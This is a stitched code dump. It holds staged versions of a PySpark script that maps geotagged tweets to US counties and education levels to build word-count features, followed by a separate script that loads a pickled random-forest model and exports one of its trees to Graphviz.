"step-1": "<mask token>\n\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return set()\n\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n\nclass WordsDictAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return dict()\n\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n\n<mask token>\n\n\ndef mapToCounty(place, location, coordinates):\n if place:\n place = place.split(',')[0].lower()\n try:\n if area_dict[place]:\n return area_dict[place]\n except:\n None\n if location:\n location = location.split(',')[0].lower()\n try:\n if area_dict[location]:\n return area_dict[location]\n except:\n None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,\n distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[closest[0], closest[1]]\n return county_dict[county_k]\n return None\n\n\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == '':\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n return tweets\n\n\n<mask token>\n\n\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = httpPattern.sub('', text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words\n return tweet\n\n\n<mask token>\n\n\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = x[0], wordDict\n return x\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return set()\n\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n\nclass WordsDictAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return dict()\n\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n\n<mask token>\n\n\ndef mapToCounty(place, location, coordinates):\n if place:\n place = place.split(',')[0].lower()\n try:\n if area_dict[place]:\n return area_dict[place]\n except:\n None\n if location:\n location = location.split(',')[0].lower()\n try:\n if area_dict[location]:\n return area_dict[location]\n except:\n None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,\n distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[closest[0], closest[1]]\n return county_dict[county_k]\n return None\n\n\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == '':\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n return tweets\n\n\ndef load_tweet(tweet, tweets_saved):\n try:\n tweet_text = tweet['text']\n tweet_user_id = tweet['user']['id']\n tweet_user_location = tweet['user']['location']\n tweet_user_lang = tweet['user']['lang']\n try:\n tweet_coordinates = tweet['coordinates']['coordinates']\n except:\n tweet_coordinates = None\n try:\n tweet_place = tweet['place']['full_name']\n except:\n tweet_place = None\n map_to_county = mapToCounty(tweet_place, tweet_user_location,\n tweet_coordinates)\n if map_to_county:\n tweet_county = int(map_to_county[0])\n tweet_education_level = tuple(map_to_county[1:])\n else:\n tweet_county = None\n tweet_education_level = None\n except KeyError:\n return {}, tweets_saved\n data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,\n 'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,\n 'tweet_education_level': tweet_education_level}\n tweets_saved += 1\n return data, tweets_saved\n\n\n<mask token>\n\n\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = httpPattern.sub('', text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words\n return tweet\n\n\n<mask token>\n\n\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = x[0], wordDict\n return x\n\n\ndef handle_file(filename):\n tweets = load_bz2_json(filename)\n tweet_dicts = []\n tweets_saved = 0\n for tweet in tweets:\n tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)\n if tweet_dict:\n tweet_dicts.append(tweet_dict)\n return tweet_dicts\n\n\ndef filterTweets(tweet):\n text = tweet['tweet_text']\n lang = tweet['tweet_user_lang']\n education = tweet['tweet_education_level']\n county = tweet['tweet_county']\n if not text or text == []:\n return False\n if lang != 'en':\n return False\n if education is None or county is None:\n return False\n return True\n\n\n<mask token>\n\n\ndef main():\n fileNames = sc.parallelize([])\n for root, dirs, files in os.walk(CACHE_DIR):\n subFileNames 
= sc.parallelize(files).map(lambda file: os.path.join(\n root, file))\n fileNames = sc.union([fileNames, subFileNames])\n tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda\n tweet: filterTweets(tweet))\n wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda\n tweet: filterTweets(tweet))\n countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],\n tweet['tweet_education_level']), tweet['tweet_text']))\n countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)\n ).map(lambda z: genVocabulary(z))\n tempRes = countyEduRdd.collect()\n print(len(tempRes))\n vocabRDD = sc.parallelize(vocabulary.value.items())\n vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)\n vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True\n )\n print('vocabulary size = ', len(vocab))\n storeResults(tempRes, vocab)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return set()\n\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n\nclass WordsDictAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return dict()\n\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n\n<mask token>\n\n\ndef mapToCounty(place, location, coordinates):\n if place:\n place = place.split(',')[0].lower()\n try:\n if area_dict[place]:\n return area_dict[place]\n except:\n None\n if location:\n location = location.split(',')[0].lower()\n try:\n if area_dict[location]:\n return area_dict[location]\n except:\n None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,\n distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[closest[0], closest[1]]\n return county_dict[county_k]\n return None\n\n\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == '':\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n return tweets\n\n\ndef load_tweet(tweet, tweets_saved):\n try:\n tweet_text = tweet['text']\n tweet_user_id = tweet['user']['id']\n tweet_user_location = tweet['user']['location']\n tweet_user_lang = tweet['user']['lang']\n try:\n tweet_coordinates = tweet['coordinates']['coordinates']\n except:\n tweet_coordinates = None\n try:\n tweet_place = tweet['place']['full_name']\n except:\n tweet_place = None\n map_to_county = mapToCounty(tweet_place, tweet_user_location,\n tweet_coordinates)\n if map_to_county:\n tweet_county = int(map_to_county[0])\n tweet_education_level = tuple(map_to_county[1:])\n else:\n tweet_county = None\n tweet_education_level = None\n except KeyError:\n return {}, tweets_saved\n data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,\n 'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,\n 'tweet_education_level': tweet_education_level}\n tweets_saved += 1\n return data, tweets_saved\n\n\n<mask token>\n\n\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = httpPattern.sub('', text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words\n return tweet\n\n\ndef combineWordLists(x, y):\n global vocabulary\n if isinstance(x, dict):\n wordDict = x\n xny = y\n else:\n wordDict = dict()\n xny = x + y\n for w in xny:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n return wordDict\n\n\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = x[0], wordDict\n return x\n\n\ndef handle_file(filename):\n tweets = load_bz2_json(filename)\n tweet_dicts = []\n tweets_saved = 0\n for tweet in tweets:\n tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)\n if tweet_dict:\n tweet_dicts.append(tweet_dict)\n return tweet_dicts\n\n\ndef filterTweets(tweet):\n text = tweet['tweet_text']\n lang = tweet['tweet_user_lang']\n education = tweet['tweet_education_level']\n county = tweet['tweet_county']\n if not text or text == []:\n return 
False\n if lang != 'en':\n return False\n if education is None or county is None:\n return False\n return True\n\n\n<mask token>\n\n\ndef main():\n fileNames = sc.parallelize([])\n for root, dirs, files in os.walk(CACHE_DIR):\n subFileNames = sc.parallelize(files).map(lambda file: os.path.join(\n root, file))\n fileNames = sc.union([fileNames, subFileNames])\n tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda\n tweet: filterTweets(tweet))\n wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda\n tweet: filterTweets(tweet))\n countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],\n tweet['tweet_education_level']), tweet['tweet_text']))\n countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)\n ).map(lambda z: genVocabulary(z))\n tempRes = countyEduRdd.collect()\n print(len(tempRes))\n vocabRDD = sc.parallelize(vocabulary.value.items())\n vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)\n vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True\n )\n print('vocabulary size = ', len(vocab))\n storeResults(tempRes, vocab)\n\n\n<mask token>\n",
"step-4": "<mask token>\nCACHE_DIR = 'D:\\\\TwitterDatastream\\\\PYTHONCACHE_SMALL'\nEDU_DATA = 'merged.csv'\nTRAIN_FEAT_CSV = 'testFeat.csv'\nTRAIN_LABS_CSV = 'testLabs.csv'\nTRAIN_FEAT_LABS_CSV = 'testFeatLabs.csv'\nFEATURE_NAMES_CSV = 'featureNames.csv'\nsc = SparkContext('local', 'test')\n\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return set()\n\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n\nclass WordsDictAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return dict()\n\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n\nvocabulary = sc.accumulator(dict(), WordsDictAccumulatorParam())\nlocation_data = pd.read_csv(EDU_DATA)\narea_dict = dict(zip(location_data['city'], location_data[['fips',\n 'without_hsd', 'with_hsd', 'somecollege', 'bachelors']].values.tolist()))\ncounty_dict = dict(zip(location_data['county'], location_data[['fips',\n 'without_hsd', 'with_hsd', 'somecollege', 'bachelors']].values.tolist()))\ncoord_dict = {tuple(x[:2]): x[2] for x in location_data[['lat', 'lng',\n 'county']].values}\nlatlon = list()\nfor index, row in location_data.iterrows():\n latlon.append([location_data['lat'][index], location_data['lng'][index]])\nlatlon = np.array(latlon)\nlatlonKDT = spatial.KDTree(latlon)\n\n\ndef mapToCounty(place, location, coordinates):\n if place:\n place = place.split(',')[0].lower()\n try:\n if area_dict[place]:\n return area_dict[place]\n except:\n None\n if location:\n location = location.split(',')[0].lower()\n try:\n if area_dict[location]:\n return area_dict[location]\n except:\n None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,\n distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[closest[0], closest[1]]\n return county_dict[county_k]\n return None\n\n\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == '':\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n return tweets\n\n\ndef load_tweet(tweet, tweets_saved):\n try:\n tweet_text = tweet['text']\n tweet_user_id = tweet['user']['id']\n tweet_user_location = tweet['user']['location']\n tweet_user_lang = tweet['user']['lang']\n try:\n tweet_coordinates = tweet['coordinates']['coordinates']\n except:\n tweet_coordinates = None\n try:\n tweet_place = tweet['place']['full_name']\n except:\n tweet_place = None\n map_to_county = mapToCounty(tweet_place, tweet_user_location,\n tweet_coordinates)\n if map_to_county:\n tweet_county = int(map_to_county[0])\n tweet_education_level = tuple(map_to_county[1:])\n else:\n tweet_county = None\n tweet_education_level = None\n except KeyError:\n return {}, tweets_saved\n data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,\n 'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,\n 'tweet_education_level': tweet_education_level}\n tweets_saved += 1\n return data, tweets_saved\n\n\nwordPattern = re.compile('\\\\b[A-Za-z_.,!\\\\\"\\']+\\\\b', re.IGNORECASE)\nhttpPattern = re.compile('^RT |@\\\\S+|http\\\\S+', re.IGNORECASE)\n\n\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = 
httpPattern.sub('', text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words\n return tweet\n\n\ndef combineWordLists(x, y):\n global vocabulary\n if isinstance(x, dict):\n wordDict = x\n xny = y\n else:\n wordDict = dict()\n xny = x + y\n for w in xny:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n return wordDict\n\n\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = x[0], wordDict\n return x\n\n\ndef handle_file(filename):\n tweets = load_bz2_json(filename)\n tweet_dicts = []\n tweets_saved = 0\n for tweet in tweets:\n tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)\n if tweet_dict:\n tweet_dicts.append(tweet_dict)\n return tweet_dicts\n\n\ndef filterTweets(tweet):\n text = tweet['tweet_text']\n lang = tweet['tweet_user_lang']\n education = tweet['tweet_education_level']\n county = tweet['tweet_county']\n if not text or text == []:\n return False\n if lang != 'en':\n return False\n if education is None or county is None:\n return False\n return True\n\n\ndef storeResults(traindata, vocab):\n columnIdx = {vocab[voc][0]: voc for voc in range(len(vocab))}\n with open(TRAIN_FEAT_CSV, 'wt') as trainFeatFile, open(TRAIN_LABS_CSV, 'wt'\n ) as trainLabsFile, open(TRAIN_FEAT_LABS_CSV, 'wt'\n ) as trainFeatLabsFile:\n trainFeatwriter = csv.writer(trainFeatFile, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n trainLabswriter = csv.writer(trainLabsFile, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n trainFeatLabswriter = csv.writer(trainFeatLabsFile, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n for row in traindata:\n edu = row[0][1]\n featDict = row[1]\n feats = np.zeros(len(columnIdx))\n for key in featDict:\n try:\n feats[columnIdx[key]] = featDict[key]\n except:\n continue\n trainFeatwriter.writerow(feats.tolist())\n trainLabswriter.writerow(list(edu))\n combList = list(edu) + feats.tolist()\n trainFeatLabswriter.writerow(combList)\n\n\ndef main():\n fileNames = sc.parallelize([])\n for root, dirs, files in os.walk(CACHE_DIR):\n subFileNames = sc.parallelize(files).map(lambda file: os.path.join(\n root, file))\n fileNames = sc.union([fileNames, subFileNames])\n tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda\n tweet: filterTweets(tweet))\n wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda\n tweet: filterTweets(tweet))\n countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],\n tweet['tweet_education_level']), tweet['tweet_text']))\n countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)\n ).map(lambda z: genVocabulary(z))\n tempRes = countyEduRdd.collect()\n print(len(tempRes))\n vocabRDD = sc.parallelize(vocabulary.value.items())\n vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)\n vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True\n )\n print('vocabulary size = ', len(vocab))\n storeResults(tempRes, vocab)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import bz2\nimport json\nimport os\nfrom pyspark.context import SparkContext\nfrom pyspark.accumulators import AccumulatorParam\nimport numpy as np\nfrom scipy import spatial\nimport pandas as pd\nimport re\nimport operator\nimport csv\n\nCACHE_DIR = \"D:\\TwitterDatastream\\PYTHONCACHE_SMALL\"\nEDU_DATA = 'merged.csv'\nTRAIN_FEAT_CSV = 'testFeat.csv'\nTRAIN_LABS_CSV = 'testLabs.csv'\nTRAIN_FEAT_LABS_CSV = 'testFeatLabs.csv'\nFEATURE_NAMES_CSV = 'featureNames.csv'\nsc = SparkContext('local', 'test')\n# location_data = pd.read_csv('new_merged.csv')\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n def zero(self, v):\n return set()\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n# An accumulator used to build the word vocabulary\nclass WordsDictAccumulatorParam(AccumulatorParam):\n def zero(self, v):\n return dict()\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n# An accumulator used to build the word vocabulary\n# vocabulary = sc.accumulator(set(), WordsSetAccumulatorParam())\nvocabulary = sc.accumulator(dict(), WordsDictAccumulatorParam())\n\n# load Education census data\nlocation_data = pd.read_csv(EDU_DATA)\narea_dict = dict(zip(location_data['city'], location_data[['fips', 'without_hsd','with_hsd', 'somecollege', 'bachelors']].values.tolist()))\ncounty_dict = dict(zip(location_data['county'], location_data[['fips', 'without_hsd','with_hsd', 'somecollege', 'bachelors']].values.tolist()))\ncoord_dict = {tuple(x[:2]):x[2] for x in location_data[['lat', 'lng', 'county']].values}\n\n# create a KD tree of known county center locations to be used to map a tweet coordinate to a county\nlatlon = list()\nfor index, row in location_data.iterrows():\n latlon.append([location_data['lat'][index], location_data['lng'][index]])\n\nlatlon = np.array(latlon)\nlatlonKDT = spatial.KDTree(latlon)\n\n# function to map place, location or coordinate data from a tweet to a FIPS code of the county and the education\n# level distribution of that county\ndef mapToCounty(place, location, coordinates):\n # coordr_dict = {tuple(x[:2]):x[2] for x in location_data[['lat_r', 'lng_r', 'county']].values}\n if place:\n place = (place.split(\",\")[0]).lower()\n # country = (place.split(\",\")[1]).lower()\n try:\n if area_dict[place]: return area_dict[place]\n except: None\n if location:\n location = (location.split(\",\")[0]).lower()\n try:\n if area_dict[location]: return area_dict[location]\n except: None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1, distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n # closest = spatial.KDTree(latlon).query(coordinates, k=1, distance_upper_bound=9)\n # if closest[0] != float('inf') and latlon[closest[1]][0] != 0. 
and latlon[closest[1]][1] != 0.:\n # print(coordinates, closest, latlon[closest[1]])\n # return closest[0], closest[1]\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[(closest[0], closest[1])]\n return county_dict[county_k]\n\n return None\n\n# Load Tweets from each file (.bz2 or .json)\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == \"\":\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n # print(filename, len(tweets))\n return tweets\n\n# strip each tweet object and keep only whats necessary in a dictonary\ndef load_tweet(tweet, tweets_saved):\n try:\n # tweet_id = tweet['id']\n tweet_text = tweet['text']\n tweet_user_id = tweet['user']['id']\n tweet_user_location = tweet['user']['location']\n tweet_user_lang = tweet['user']['lang']\n try: tweet_coordinates = tweet['coordinates']['coordinates']\n except: tweet_coordinates = None\n try: tweet_place = tweet['place']['full_name']\n except: tweet_place = None\n map_to_county = mapToCounty(tweet_place, tweet_user_location, tweet_coordinates)\n if map_to_county:\n tweet_county = int(map_to_county[0])\n tweet_education_level = tuple(map_to_county[1:])\n else:\n tweet_county = None\n tweet_education_level = None\n # created_at = tweet['created_at']\n except KeyError:\n return {}, tweets_saved\n\n data = {'tweet_text': tweet_text,\n # 'tweet_id': tweet_id,\n 'tweet_user_id': tweet_user_id,\n # 'tweet_user_location': tweet_user_location,\n 'tweet_user_lang': tweet_user_lang,\n # 'tweet_place': tweet_place,\n # 'tweet_coordinates': tweet_coordinates,\n 'tweet_county': tweet_county,\n 'tweet_education_level': tweet_education_level}\n # 'date_loaded': datetime.datetime.now(),\n # 'tweet_json': json.dumps(tweet)}\n\n tweets_saved += 1\n return data, tweets_saved\n\nwordPattern = re.compile(r\"\\b[A-Za-z_.,!\\\"']+\\b\", re.IGNORECASE)\nhttpPattern = re.compile(r\"^RT |@\\S+|http\\S+\", re.IGNORECASE)\n\n# Function that uses regular expressions to remove unwanted characters, URLs, etc. 
and split tweet_text\n# into meaningful words\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = httpPattern.sub(r\"\", text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words #list(zip(words, [1]*len(words)))\n # print(tweet)\n return tweet\n\n# function to combine word lists and count frequency of each word locally\ndef combineWordLists(x ,y):\n global vocabulary\n if isinstance(x, dict):\n wordDict = x\n xny = y\n else:\n wordDict = dict()\n xny = x + y\n for w in xny:\n # vocabulary +=[w]\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n\n return wordDict\n\n# function to add words to the vocabulary and count frequency of each word globally\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = (x[0],wordDict)\n return x\n\n# read tweets from each file and parse them into dictionaries with only relevant data\ndef handle_file(filename):\n tweets = load_bz2_json(filename)\n tweet_dicts = []\n tweets_saved = 0\n for tweet in tweets:\n tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)\n if tweet_dict:\n tweet_dicts.append(tweet_dict)\n\n return tweet_dicts\n\n# filter only tweets that have text, land, education and are written in english\ndef filterTweets(tweet):\n # location = tweet['tweet_user_location']\n # coordinates = tweet['tweet_place']\n # place = tweet['tweet_coordinates']\n text = tweet['tweet_text']\n lang = tweet['tweet_user_lang']\n education = tweet['tweet_education_level']\n county = tweet['tweet_county']\n # if location or coordinates or place: ret = True\n # else: return False\n if not text or text == []: return False\n if lang != 'en': return False\n if education is None or county is None: return False\n\n return True\n\n# store all data into CSV files\ndef storeResults(traindata, vocab):\n columnIdx = {vocab[voc][0]: voc for voc in range(len(vocab))}\n\n with open(TRAIN_FEAT_CSV, 'wt') as trainFeatFile, open(TRAIN_LABS_CSV, 'wt') as trainLabsFile, open(TRAIN_FEAT_LABS_CSV, 'wt') as trainFeatLabsFile:\n trainFeatwriter = csv.writer(trainFeatFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n trainLabswriter = csv.writer(trainLabsFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n trainFeatLabswriter = csv.writer(trainFeatLabsFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n for row in traindata:\n edu = row[0][1]\n featDict = row[1]\n feats = np.zeros(len(columnIdx))\n for key in featDict:\n try:\n feats[columnIdx[key]] = featDict[key]\n except:\n continue\n trainFeatwriter.writerow(feats.tolist())\n trainLabswriter.writerow(list(edu))\n combList = list(edu) + feats.tolist()\n trainFeatLabswriter.writerow(combList)\n\n# main function with all the Spark code\ndef main():\n fileNames = sc.parallelize([])\n\n # generate a list of all files in the data directory\n for root, dirs, files in os.walk(CACHE_DIR):\n subFileNames = sc.parallelize(files).map(lambda file: os.path.join(root, file))\n fileNames = sc.union([fileNames, subFileNames])\n # load all tweets and filter\n tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda tweet: filterTweets(tweet))\n # clean, parse and filter tweets and map each to county and education level\n wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda tweet: 
filterTweets(tweet))\n # set county and education level as the key for each tweet and keep only the text as value\n countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'], tweet['tweet_education_level']), tweet['tweet_text']))\n # aggregate tweets based on county level and generate vocabulary\n countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)).map(lambda z: genVocabulary(z))\n tempRes = countyEduRdd.collect()\n # print(tempRes)\n print(len(tempRes))\n vocabRDD = sc.parallelize(vocabulary.value.items())\n # filter out words that only occur once in the entire dataset (mainly noise)\n vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)\n # print(\"vocabulary = \", sorted(vocabulary.value.items(), key=operator.itemgetter(1)))\n vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True)\n # print(\"vocabulary = \", vocab)\n print(\"vocabulary size = \", len(vocab))\n storeResults(tempRes, vocab)\n\nif __name__ == \"__main__\":\n main()",
"step-ids": [
10,
14,
15,
18,
20
]
}
|
[
10,
14,
15,
18,
20
] |
"""
Author: Alan Danque
Date: 20210323
Purpose: Final data prep, trained-model load, and decision-tree rendering to PNG.
"""
from sklearn.tree import export_graphviz
import pydot
import pickle
from pathlib import Path
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
import time
start_time = time.time()
pd.options.mode.chained_assignment = None # default='warn' # https://stackoverflow.com/questions/20625582/how-to-deal-with-settingwithcopywarning-in-pandas
results_dir = Path('C:/Alan/DSC680/Project1Data/').joinpath('results')
results_dir.mkdir(parents=True, exist_ok=True)
filepath = "C:/Alan/DSC680/Project1Data/FinalLeadAnalyticsRecord2.csv"
data = pd.read_csv(filepath)
print(data.shape)
shape = data.shape
print('\nDataFrame Shape :', shape)
print('\nNumber of rows :', shape[0])
print('\nNumber of columns :', shape[1])
amsmodel1 = data
del amsmodel1['street_address']
amsmodel1.fillna(0, inplace=True)
#amsmodel1.replace(np.nan,0)
print("Dataframe Loaded: --- %s seconds ---" % (time.time() - start_time))
# load model and predict
model_file = results_dir.joinpath('My3rdModel.pkl')
with open(model_file, 'rb') as f:
rf = pickle.load(f)
#rf.predict(X[0:1])
print("Model Loaded: --- %s seconds ---" % (time.time() - start_time))
target = np.array(amsmodel1['price'])
features = amsmodel1.drop('price', axis = 1)
feature_list = list(features.columns)
features = np.array(features)
print(feature_list)
print(features)
print("Features Loaded: --- %s seconds ---" % (time.time() - start_time))
"""
from sklearn.model_selection import RandomizedSearchCV
# Number of trees in random forest
n_estimators = [int(x) for x in np.linspace(start = 200, stop = 2000, num = 10)]
# Number of features to consider at every split
max_features = ['auto', 'sqrt']
# Maximum number of levels in tree
max_depth = [int(x) for x in np.linspace(10, 110, num = 11)]
max_depth.append(None)
# Minimum number of samples required to split a node
min_samples_split = [2, 5, 10]
# Minimum number of samples required at each leaf node
min_samples_leaf = [1, 2, 4]
# Method of selecting samples for training each tree
bootstrap = [True, False]
# Create the random grid
random_grid = {'n_estimators': n_estimators,
'max_features': max_features,
'max_depth': max_depth,
'min_samples_split': min_samples_split,
'min_samples_leaf': min_samples_leaf,
'bootstrap': bootstrap}
print(random_grid)
print("Estimators Loaded: --- %s seconds ---" % (time.time() - start_time))
"""
# Decision Tree
## SAVING THE DECISION TREE
tree = rf.estimators_[5]
tree_dot_file = results_dir.joinpath('tree.dot')
tree_png_file = results_dir.joinpath('tree.png')
with open(tree_dot_file, 'w') as dotfile:
    export_graphviz(tree, out_file=dotfile, feature_names=feature_list, rounded=True, precision=1)
# the 'with' block closes (and flushes) tree.dot before pydot reads it back
# Install https://graphviz.org/download/#windows
#(graph, ) = pydot.graph_from_dot_file(tree_dot_file)
#graph.write_png(tree_png_file)
# C:\Program Files\Graphviz\bin
# If pydot.graph_from_dot_file misbehaves, the .dot file can instead be rendered with the Graphviz CLI via subprocess:
## from subprocess import check_call
